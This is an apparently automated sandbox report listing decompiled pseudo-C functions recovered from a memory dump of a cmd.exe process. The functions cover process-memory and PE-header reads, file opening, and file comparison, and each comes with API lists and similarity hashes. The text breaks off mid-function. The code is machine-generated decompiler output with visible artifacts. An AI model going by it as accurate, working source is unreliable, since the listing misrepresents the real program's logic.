                                    C-Code - Quality: 71%
                                    			E011F53E0(void* __ecx, void* __edx) {
                                    				signed int _v8;
                                    				intOrPtr _v968;
                                    				intOrPtr _v1004;
                                    				intOrPtr _v1140;
                                    				void _v1148;
                                    				void _v1152;
                                    				void _v1156;
                                    				void _v1160;
                                    				long _v1164;
                                    				void* _v1184;
                                    				char _v1188;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t22;
                                    				void* _t42;
                                    				struct HINSTANCE__* _t47;
                                    				void* _t62;
                                    				void* _t63;
                                    				signed int _t64;
                                    
                                    				_t60 = __edx;
                                    				_t22 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t22 ^ _t64;
                                    				_t62 = __ecx;
                                    				_v1152 = 0;
                                    				if( *0x1218104 != 0) {
                                    					L4:
                                    					_t63 =  *0x1218100;
                                    					L5:
                                    					if(_t63 != 0) {
                                    						 *0x12194b4(_t62, 0,  &_v1188, 0x18, 0);
                                    						if( *_t63() >= 0) {
                                    							_t63 = _v1184;
                                    							if(ReadProcessMemory(_t62, _t63,  &_v1148, 0x470,  &_v1164) != 0) {
                                    								if(_v1164 < 0xb4 || _v1004 - _t63 <= 0xb4) {
                                    									if(ReadProcessMemory(_t62, _v1140 + 0x3c,  &_v1160, 4, 0) != 0 && ReadProcessMemory(_t62, _v1140 + _v1160 + 4,  &_v1156, 2, 0) != 0) {
                                    										_t60 = _v1160 + _v1140 + 0x18;
                                    										_t42 = E011F573B(_v1156, _v1160 + _v1140 + 0x18);
                                    										if(_t42 != 0) {
                                    											ReadProcessMemory(_t62, _t42,  &_v1152, 2, 0);
                                    										}
                                    									}
                                    								} else {
                                    									_v1152 = _v968;
                                    								}
                                    							}
                                    						}
                                    					}
                                    					return E011E6FD0(_v1152, 0, _v8 ^ _t64, _t60, _t62, _t63);
                                    				}
                                    				_t47 = LoadLibraryExW(L"NTDLL.DLL", 0, 0);
                                    				 *0x1218104 = _t47;
                                    				if(_t47 == 0) {
                                    					 *0x1218104 =  *0x1218104 | 0xffffffff;
                                    					goto L4;
                                    				} else {
                                    					_t63 = GetProcAddress(_t47, "NtQueryInformationProcess");
                                    					 *0x1218100 = _t63;
                                    					goto L5;
                                    				}
                                    			}


                                    APIs
                                    • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 011F5414
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 011F5429
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000470,?), ref: 011F5487
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 011F54D3
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 011F54FA
                                    • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 011F5531
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                    • String ID: NTDLL.DLL$NtQueryInformationProcess
                                    • API String ID: 1580871199-2613899276
                                    • Opcode ID: 5e8117be712654ac61dab451284ae9d2e02ee49defa53aab92debe33027f431c
                                    • Instruction ID: 2d2afdad2ff707ede3e1d5cbb998ba88fd6386d677440dfcc771fd4dd70a5b1b
                                    • Opcode Fuzzy Hash: 5e8117be712654ac61dab451284ae9d2e02ee49defa53aab92debe33027f431c
                                    • Instruction Fuzzy Hash: 044187B1A001199BEB64CB25DC88B7E777EEB54648F00409DEB09E3245DB309E81CF65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 48%
                                    			E011D5DB5(void* __ecx, signed int __edx) {
                                    				long _v8;
                                    				WCHAR* _v12;
                                    				struct _SECURITY_ATTRIBUTES _v24;
                                    				void* __ebx;
                                    				signed int _t15;
                                    				long _t17;
                                    				void* _t19;
                                    				long _t22;
                                    				long _t23;
                                    				WCHAR* _t32;
                                    				signed int _t38;
                                    				void* _t39;
                                    				void* _t40;
                                    				signed int _t42;
                                    
                                    				_v24.lpSecurityDescriptor = _v24.lpSecurityDescriptor & 0x00000000;
                                    				_t39 = __ecx;
                                    				_v24.nLength = 0xc;
                                    				_t23 = 3;
                                    				_t41 = __edx;
                                    				_t38 = __edx & _t23;
                                    				_v24.bInheritHandle = 1;
                                    				if(_t38 > 2) {
                                    					L2:
                                    					_t42 = _t41 | 0xffffffff;
                                    					L3:
                                    					return _t42;
                                    				}
                                    				_t15 = __edx & 0x00000009;
                                    				if(_t15 != 9) {
                                    					_push(L"con");
                                    					_push(__ecx);
                                    					if(_t38 != 0) {
                                    						_t41 = (__edx | 1) << 0x1e;
                                    						__imp___wcsicmp();
                                    						if(_t15 != 0) {
                                    							_t23 = 1;
                                    						}
                                    						_v8 = 2;
                                    					} else {
                                    						_t41 = 0x80000000;
                                    						_v8 = 3;
                                    						__imp___wcsicmp();
                                    						if(_t15 == 0) {
                                    							_t23 = 1;
                                    						}
                                    					}
                                    					_t32 = E011E22C0(_t23, _t39);
                                    					_t17 = _v8;
                                    					_v12 = _t32;
                                    					if(_t17 == 2) {
                                    						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, 3, 0x8000080, 0);
                                    						_t40 = _t19;
                                    						if(_t40 != 0xffffffff) {
                                    							goto L8;
                                    						}
                                    						_t17 = _v8;
                                    						_t32 = _v12;
                                    						goto L7;
                                    					} else {
                                    						L7:
                                    						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, _t17, 0x8000080, 0);
                                    						_t40 = _t19;
                                    						if(_t40 == 0xffffffff) {
                                    							_t22 = GetLastError();
                                    							 *0x1213cf0 = _t22;
                                    							if(_t22 == 0x6e) {
                                    								 *0x1213cf0 = 2;
                                    							}
                                    							goto L2;
                                    						}
                                    						L8:
                                    						__imp___open_osfhandle(_t40, 8);
                                    						_t42 = _t19;
                                    						if(_t42 == 0xffffffff) {
                                    							CloseHandle(_t40);
                                    						}
                                    						goto L3;
                                    					}
                                    				}
                                    				goto L2;
                                    			}

                                    APIs
                                    • _wcsicmp.MSVCRT ref: 011D5E10
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,08000080,00000003,08000080,00000000), ref: 011D5E43
                                    • _open_osfhandle.MSVCRT ref: 011D5E57
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011E9D2B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                    • String ID: con
                                    • API String ID: 689241570-4257191772
                                    • Opcode ID: 61c2be903768f69d0c8bf785e21a17f9b27e0fa5495130a29794849cf9f2b26c
                                    • Instruction ID: d5e535bad670562cf576daf8d1995ffdf3640aac4a5b5a8043e3d48a8137f881
                                    • Opcode Fuzzy Hash: 61c2be903768f69d0c8bf785e21a17f9b27e0fa5495130a29794849cf9f2b26c
                                    • Instruction Fuzzy Hash: 15313932A00514AFE73CDAACA84DB6EBAFAE751639F210319E921E32C0DF704D018761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 96%
                                    			E011F554F(WCHAR* __ecx, void* __edx) {
                                    				signed int _v8;
                                    				long _v16;
                                    				char _v76;
                                    				signed short _v80;
                                    				char _v96;
                                    				char _v100;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t12;
                                    				signed int _t15;
                                    				signed short _t23;
                                    				signed short* _t31;
                                    				signed int _t32;
                                    				void* _t42;
                                    				void* _t43;
                                    				signed int _t44;
                                    
                                    				_t41 = __edx;
                                    				_t12 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t12 ^ _t44;
                                    				_t42 = 0;
                                    				_t32 = 0;
                                    				if(__ecx != 0) {
                                    					_t43 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
                                    					if(_t43 == 0xffffffff) {
                                    						L16:
                                    						_t15 = _t32;
                                    						goto L17;
                                    					}
                                    					_t41 =  &_v76;
                                    					if(E011F5768(_t43,  &_v76, 0x40) != 0 && 0x5a4d == _v76 && SetFilePointer(_t43, _v16, 0, 0) != 0xffffffff) {
                                    						_t41 =  &_v100;
                                    						if(E011F5768(_t43,  &_v100, 4) != 0 && _v100 == 0x4550) {
                                    							_t41 =  &_v96;
                                    							if(E011F5768(_t43,  &_v96, 0x14) != 0) {
                                    								_t23 = _v80;
                                    								if(_t23 != 0) {
                                    									_t42 = HeapAlloc(GetProcessHeap(), 8, _t23 & 0x0000ffff);
                                    									if(_t42 != 0) {
                                    										_t41 = _t42;
                                    										if(E011F5768(_t43, _t42, _v80 & 0x0000ffff) != 0) {
                                    											_t41 = _t42;
                                    											_t31 = E011F573B(_v96, _t42);
                                    											if(_t31 != 0) {
                                    												_t32 =  *_t31 & 0x0000ffff;
                                    											}
                                    										}
                                    										RtlFreeHeap(GetProcessHeap(), 0, _t42);
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    					CloseHandle(_t43);
                                    					goto L16;
                                    				} else {
                                    					_t15 = 0;
                                    					L17:
                                    					return E011E6FD0(_t15, _t32, _v8 ^ _t44, _t41, _t42, _t43);
                                    				}
                                    			}

                                    APIs
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 011F5584
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 011F55BE
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 011F5601
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011F5608
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 011F563A
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F5641
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 011F5648
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                    • String ID: PE
                                    • API String ID: 3093239467-4258593460
                                    • Opcode ID: 0a407dce7c18736993dfde85094fb45ce55dfc38be941e2c8ea29e06575ca7e0
                                    • Instruction ID: 72bdf582741cb09c69ab96785492e3546fa00ff7b84a992b2119fa9095647a1d
                                    • Opcode Fuzzy Hash: 0a407dce7c18736993dfde85094fb45ce55dfc38be941e2c8ea29e06575ca7e0
                                    • Instruction Fuzzy Hash: 3C31E534600214A7EF68A7696C0CFBE7AAB9B94B25F44021CFF61D65C4DF318942CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E011F84FE(void* __eax, void* __edx, void* __eflags, DWORD* _a4, intOrPtr _a8, long _a12) {
                                    				char _v8;
                                    				void* __ecx;
                                    				void* _t12;
                                    				void* _t14;
                                    				LONG* _t15;
                                    				void* _t19;
                                    				void* _t21;
                                    				void* _t23;
                                    				void** _t24;
                                    				void** _t26;
                                    				void* _t38;
                                    				void* _t39;
                                    				void* _t41;
                                    				DWORD* _t42;
                                    				LONG* _t44;
                                    				void* _t45;
                                    
                                    				_t24 = _t26;
                                    				_t39 = __edx;
                                    				__imp___get_osfhandle( *_t24, _t38, _t41, _t23, _t26);
                                    				FlushFileBuffers(__eax);
                                    				_t28 =  *_t24;
                                    				E011DDB92( *_t24);
                                    				_t30 = E011D5DB5(_t39, 0, _t28, _t28);
                                    				 *_t24 = _t30;
                                    				if(_t30 != 0xffffffff) {
                                    					_t42 = _a4;
                                    					_t12 =  ~_t42;
                                    					__imp___get_osfhandle(2);
                                    					SetFilePointer(_t12, _t30, _t12, 0);
                                    					_t14 =  &_v8;
                                    					__imp___get_osfhandle(0);
                                    					_t15 = ReadFile(_t14,  *_t24, _a12, _t42, _t14);
                                    					if(_t15 != 0) {
                                    						if(_v8 != _t42) {
                                    							goto L3;
                                    						} else {
                                    							_push(_t42);
                                    							_push(_a12);
                                    							_push(_a8);
                                    							L011E82C7();
                                    							_t30 =  *_t24;
                                    							_t45 = _t45 + 0xc;
                                    							_t44 = _t15;
                                    							E011DDB92( *_t24);
                                    							if(_t44 != 0) {
                                    								goto L4;
                                    							} else {
                                    								_t21 = E011D5DB5(_t39, 1, _t39, _t39);
                                    								 *_t24 = _t21;
                                    								if(_t21 == 0xffffffff) {
                                    									goto L1;
                                    								} else {
                                    									__imp___get_osfhandle(2);
                                    									SetFilePointer(_t21, _t21, _t44, _t44);
                                    									_t19 = 0;
                                    								}
                                    							}
                                    						}
                                    					} else {
                                    						L3:
                                    						_t30 =  *_t24;
                                    						E011DDB92( *_t24);
                                    						L4:
                                    						 *_t24 =  *_t24 | 0xffffffff;
                                    						goto L1;
                                    					}
                                    				} else {
                                    					L1:
                                    					E011DC5A2(_t30, 0x4000271f, 1, _t39);
                                    					_t19 = 1;
                                    				}
                                    				return _t19;
                                    			}

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F850D
                                    • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F8CE3,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 011F8515
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    • _get_osfhandle.MSVCRT ref: 011F855B
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 011F8563
                                    • _get_osfhandle.MSVCRT ref: 011F8575
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,00000000,00000000), ref: 011F857D
                                    • memcmp.MSVCRT ref: 011F859F
                                    • _get_osfhandle.MSVCRT ref: 011F85D0
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 011F85D8
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: File_get_osfhandle$Pointer$BuffersFlushRead_closememcmp
                                    • String ID:
                                    • API String ID: 332413853-0
                                    • Opcode ID: a50de4650c369f47b70831d865aa193a37e52136944a00e5d510f2459573d465
                                    • Instruction ID: 4d4b5de74498c1a2dc1286201c72742d6594ea340d43259d74b5be6da6e05bb6
                                    • Opcode Fuzzy Hash: a50de4650c369f47b70831d865aa193a37e52136944a00e5d510f2459573d465
                                    • Instruction Fuzzy Hash: 5D21D231A00115ABDF2C9FA9AC4DE7B3BAAEF95364F004619F515C61D4DF714C40C761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 74%
                                    			E011D81E0(intOrPtr _a4, long _a8, signed int* _a16) {
                                    				signed int _v8;
                                    				void* _v12;
                                    				int _v20;
                                    				char _v24;
                                    				int _v28;
                                    				void* _v32;
                                    				void* _v36;
                                    				void* _v40;
                                    				void* _v44;
                                    				void _v548;
                                    				void* _v552;
                                    				long _v556;
                                    				char _v560;
                                    				int _v564;
                                    				void* _v568;
                                    				void* _v572;
                                    				void* _v580;
                                    				void _v1084;
                                    				signed int _v1088;
                                    				signed int _v1092;
                                    				signed int _v1096;
                                    				signed int _v1100;
                                    				long _v1104;
                                    				void* _v1108;
                                    				void* _v1112;
                                    				void* _v1120;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t93;
                                    				long _t95;
                                    				signed int _t97;
                                    				signed int _t111;
                                    				WCHAR* _t117;
                                    				void* _t119;
                                    				signed int _t120;
                                    				WCHAR* _t122;
                                    				int _t123;
                                    				signed char* _t126;
                                    				WCHAR* _t127;
                                    				WCHAR* _t129;
                                    				signed int _t134;
                                    				WCHAR* _t135;
                                    				void* _t136;
                                    				char _t140;
                                    				void* _t141;
                                    				signed int* _t142;
                                    				signed int _t153;
                                    				signed int _t164;
                                    				intOrPtr _t167;
                                    				void* _t168;
                                    				long _t169;
                                    				WCHAR* _t170;
                                    				char _t172;
                                    				void* _t173;
                                    				signed int _t174;
                                    				signed int _t176;
                                    				signed int _t178;
                                    
                                    				_t176 = (_t174 & 0xfffffff8) - 0x44c;
                                    				_t93 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t93 ^ _t176;
                                    				_t95 = _a8;
                                    				_t142 = _a16;
                                    				_v1104 = _t95;
                                    				_v1096 =  *(_t95 + 2) & 0x0000ffff;
                                    				_t140 = 1;
                                    				_t97 =  *_t142;
                                    				_v1088 = _t142;
                                    				_v560 = 1;
                                    				_t167 = _a4;
                                    				_t172 = 0;
                                    				_v1100 = _t97 & 0x00002000;
                                    				_v1092 = _t97 & 0x00000800;
                                    				_v556 = 0x104;
                                    				_v564 = 0;
                                    				memset( &_v1084, 0, 0x104);
                                    				_v28 = 0;
                                    				_v24 = 1;
                                    				_v20 = 0x104;
                                    				memset( &_v548, 0, 0x104);
                                    				_t178 = _t176 + 0x18;
                                    				if(E011E0C70( &_v1084, 0x7fe9) < 0 || E011E0C70( &_v548, 0x7fe9) < 0) {
                                    					L23:
                                    					_t172 = _t140;
                                    					goto L24;
                                    				} else {
                                    					if(_v1100 != 0 || _v1092 != 0 ||  *((char*)(_t167 + 0x11)) != 0) {
                                    						L6:
                                    						_t161 = _v1104;
                                    						if(( *(_t161 + 4) & 0x00000010) != 0) {
                                    							L24:
                                    							_t140 = _t172;
                                    							L25:
                                    							_t172 = _t140;
                                    							L26:
                                    							_t140 = _t172;
                                    							L27:
                                    							_t172 = _t140;
                                    							L17:
                                    							__imp__??_V@YAXPAX@Z(_v28);
                                    							__imp__??_V@YAXPAX@Z(_v564);
                                    							_pop(_t168);
                                    							_pop(_t173);
                                    							_pop(_t141);
                                    							return E011E6FD0(_t172, _t141, _v8 ^ _t178, _t161, _t168, _t173);
                                    						}
                                    						_t151 = _v564;
                                    						if(_v564 == 0) {
                                    							_t151 =  &_v1084;
                                    						}
                                    						_t111 = _t161 + 0x30 + (_v1096 & 0x0000ffff) * 2;
                                    						_t161 = _v556;
                                    						_v1096 = _t111;
                                    						if(E011E51C9(_t151, _v556,  *((intOrPtr*)(_t167 + 4)), _t111) != 0) {
                                    							_push(_v1096);
                                    							E011DC5A2(_t151, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
                                    							_t178 = _t178 + 0x10;
                                    							goto L25;
                                    						} else {
                                    							_t152 = _v28;
                                    							if(_v28 == 0) {
                                    								_t152 =  &_v548;
                                    							}
                                    							_t163 = _v20;
                                    							if(E011E51C9(_t152, _v20,  *((intOrPtr*)(_t167 + 4)), _v1104 + 0x30) != 0) {
                                    								_t117 = _v564;
                                    								__eflags = _t117;
                                    								if(_t117 == 0) {
                                    									_t117 =  &_v1084;
                                    								}
                                    								_t153 =  &_v548;
                                    								E011E0D89(_t163, _t117);
                                    							}
                                    							if(_v1092 != _t172) {
                                    								_t153 = _v28;
                                    								__eflags = _t153;
                                    								if(_t153 == 0) {
                                    									_t153 =  &_v548;
                                    								}
                                    								_t161 = 0x232c;
                                    								_t119 = E011F9583(_t153, 0x232c, 0x2328);
                                    								__eflags = _t119 - _t140;
                                    								if(_t119 == _t140) {
                                    									goto L12;
                                    								} else {
                                    									__eflags =  *0x11fd544 - _t172; // 0x0
                                    									if(__eflags == 0) {
                                    										goto L26;
                                    									}
                                    									goto L25;
                                    								}
                                    							} else {
                                    								L12:
                                    								_t120 = _v1088;
                                    								_t169 = _v1104;
                                    								_t164 =  *(_t169 + 4);
                                    								_t154 = _t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000;
                                    								if(((_t120 & 0xffffff00 | (_t164 & 0x00000001) != 0x00000000) & (_t153 & 0xffffff00 | ( *_t120 & 0x00001000) != 0x00000000)) != 0) {
                                    									_t122 = _v564;
                                    									__eflags = _t122;
                                    									if(_t122 == 0) {
                                    										_t122 =  &_v1084;
                                    									}
                                    									_t161 = _t164 & 0xfffffffe;
                                    									_t123 = SetFileAttributesW(_t122, _t164 & 0xfffffffe);
                                    									__eflags = _t123;
                                    									if(_t123 != 0) {
                                    										goto L13;
                                    									} else {
                                    										_push(_t172);
                                    										_push(GetLastError());
                                    										E011DC5A2(_t154);
                                    										goto L27;
                                    									}
                                    								}
                                    								L13:
                                    								_t155 = _v28;
                                    								if(_v28 == 0) {
                                    									_t155 =  &_v548;
                                    								}
                                    								_t161 =  *(_t169 + 4);
                                    								if(E011D83F2(_t155,  *(_t169 + 4)) != 0) {
                                    									_t155 = _v564;
                                    									__eflags = _v564;
                                    									if(_v564 == 0) {
                                    										_t155 =  &_v1084;
                                    									}
                                    									_t161 =  *(_t169 + 4);
                                    									_t170 = E011D83F2(_t155,  *(_t169 + 4));
                                    									__eflags = _t170;
                                    									if(_t170 == 0) {
                                    										goto L15;
                                    									} else {
                                    										__eflags = _t170 - 0x4d3;
                                    										if(_t170 == 0x4d3) {
                                    											goto L27;
                                    										}
                                    										_t129 = _v28;
                                    										__eflags = _t129;
                                    										if(_t129 == 0) {
                                    											_t129 =  &_v548;
                                    										}
                                    										E011E25D9(L"%s\r\n");
                                    										E011DC5A2(_t155, _t170, _t172, _t129);
                                    										_t178 = _t178 + 0x10;
                                    										goto L17;
                                    									}
                                    								} else {
                                    									L15:
                                    									_t126 = _v1088;
                                    									_t126[0x60] = _t126[0x60] + 1;
                                    									if( *0x1213cc9 != 0 && ( *_t126 & 0x00000010) != 0) {
                                    										_t127 = _v28;
                                    										__eflags = _t127;
                                    										if(_t127 == 0) {
                                    											_t127 =  &_v548;
                                    										}
                                    										E011DC108(_t155, 0x400023a1, _t140, _t127);
                                    										_t178 = _t178 + 0xc;
                                    									}
                                    									goto L17;
                                    								}
                                    							}
                                    						}
                                    					} else {
                                    						_t134 = E011D8512( *((intOrPtr*)(_t167 + 8)),  *((intOrPtr*)(_t167 + 0xc)));
                                    						_v1100 = _t134;
                                    						if(_t134 != 0) {
                                    							_t159 = _v564;
                                    							__eflags = _v564;
                                    							if(_v564 == 0) {
                                    								_t159 =  &_v1084;
                                    							}
                                    							_t161 = _v556;
                                    							_t135 = E011E51C9(_t159, _v556,  *((intOrPtr*)(_t167 + 4)), _t134);
                                    							__eflags = _t135;
                                    							if(_t135 == 0) {
                                    								_t160 = _v564;
                                    								 *((char*)(_t167 + 0x11)) = _t140;
                                    								__eflags = _v564;
                                    								if(_v564 == 0) {
                                    									_t160 =  &_v1084;
                                    								}
                                    								_t161 = 0x234e;
                                    								_t136 = E011F9583(_t160, 0x234e, 0x2328);
                                    								__eflags = _t136 - _t140;
                                    								if(_t136 != _t140) {
                                    									goto L23;
                                    								} else {
                                    									goto L6;
                                    								}
                                    							} else {
                                    								_push(_v1100);
                                    								E011DC5A2(_t159, 0x400023da, 2,  *((intOrPtr*)(_t167 + 4)));
                                    								_t178 = _t178 + 0x10;
                                    								goto L23;
                                    							}
                                    						}
                                    						goto L6;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 011D8254
                                    • memset.MSVCRT ref: 011D8280
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D83BB
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D83C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: %s
                                    • API String ID: 2221118986-3043279178
                                    • Opcode ID: b29e2c05960ec1431416e3afc94a7de5d6c8c4c1a057eba34597a5caa911ab17
                                    • Instruction ID: 7cca5aba5fa2d5464b9d8b81d44404aa2f8a26b34c34bb3d234dcb151feb8e8c
                                    • Opcode Fuzzy Hash: b29e2c05960ec1431416e3afc94a7de5d6c8c4c1a057eba34597a5caa911ab17
                                    • Instruction Fuzzy Hash: 3591A2712083429BD73DDF58C894BAFB7E5BF98204F04491DFA8987251DB34E944C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 49%
                                    			E011D8F70(signed int __ecx, wchar_t* __edx, void* __eflags, signed int* _a4, intOrPtr _a8) {
                                    				void* _v8;
                                    				signed int _v12;
                                    				char _v20;
                                    				wchar_t* _v32;
                                    				void* _v36;
                                    				void* _v40;
                                    				void* _v44;
                                    				signed int _v48;
                                    				wchar_t* _v52;
                                    				signed int _v56;
                                    				int _v60;
                                    				wchar_t* _v64;
                                    				intOrPtr _v68;
                                    				signed int _v72;
                                    				int _v76;
                                    				signed short* _v80;
                                    				void* _v84;
                                    				signed short* _v88;
                                    				signed short* _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				signed short* _v104;
                                    				void* __edi;
                                    				void* __ebp;
                                    				signed int _t127;
                                    				int _t130;
                                    				signed int* _t131;
                                    				intOrPtr* _t135;
                                    				signed int _t139;
                                    				intOrPtr _t142;
                                    				intOrPtr _t143;
                                    				short* _t144;
                                    				intOrPtr _t145;
                                    				intOrPtr _t146;
                                    				signed short* _t149;
                                    				wchar_t* _t150;
                                    				intOrPtr _t152;
                                    				intOrPtr _t153;
                                    				intOrPtr _t154;
                                    				intOrPtr _t155;
                                    				intOrPtr _t156;
                                    				intOrPtr _t157;
                                    				signed int _t158;
                                    				signed short* _t162;
                                    				void _t163;
                                    				signed int _t165;
                                    				intOrPtr _t167;
                                    				signed int _t171;
                                    				signed int _t173;
                                    				signed short* _t175;
                                    				intOrPtr* _t176;
                                    				signed int _t178;
                                    				signed int _t179;
                                    				signed int _t180;
                                    				intOrPtr _t181;
                                    				signed short* _t190;
                                    				wchar_t* _t191;
                                    				intOrPtr* _t192;
                                    				intOrPtr* _t195;
                                    				signed int _t197;
                                    				void* _t198;
                                    				void* _t199;
                                    				intOrPtr* _t203;
                                    				intOrPtr* _t206;
                                    				intOrPtr* _t209;
                                    				void* _t212;
                                    				intOrPtr* _t213;
                                    				signed int _t219;
                                    				signed short* _t220;
                                    				signed short* _t226;
                                    				signed short* _t228;
                                    				wchar_t* _t229;
                                    				short* _t230;
                                    				void* _t231;
                                    				void* _t232;
                                    				intOrPtr* _t233;
                                    				signed short* _t237;
                                    				void* _t240;
                                    				void* _t241;
                                    				void* _t242;
                                    				void* _t243;
                                    				signed short* _t244;
                                    				signed short* _t247;
                                    				wchar_t* _t252;
                                    				WCHAR* _t254;
                                    				void* _t255;
                                    				signed int _t256;
                                    				intOrPtr* _t258;
                                    				signed int _t260;
                                    				void* _t262;
                                    				intOrPtr* _t265;
                                    				signed int _t267;
                                    				signed int _t268;
                                    				intOrPtr* _t269;
                                    				signed short* _t270;
                                    				signed short* _t271;
                                    				signed short* _t272;
                                    				signed short* _t273;
                                    				intOrPtr _t276;
                                    				signed int _t277;
                                    				void* _t278;
                                    				void* _t279;
                                    				void* _t282;
                                    
                                    				_t229 = __edx;
                                    				_push(0xfffffffe);
                                    				_push(0x11fbe58);
                                    				_push(E011E7290);
                                    				_push( *[fs:0x0]);
                                    				_t279 = _t278 - 0x54;
                                    				_t127 =  *0x11fd0b4; // 0x2833377e
                                    				_v12 = _v12 ^ _t127;
                                    				_push(_t127 ^ _t277);
                                    				 *[fs:0x0] =  &_v20;
                                    				_v52 = __edx;
                                    				_v56 = __ecx;
                                    				_v60 = 0;
                                    				_t252 = 0;
                                    				_v40 = 0;
                                    				_t262 = 0;
                                    				_v36 = 0;
                                    				_v8 = 0;
                                    				_t130 = E011E00B0(0x4000);
                                    				_v60 = _t130;
                                    				if(_t130 == 0) {
                                    					_t171 = _v56;
                                    					if(_t171 == 0) {
                                    						L74:
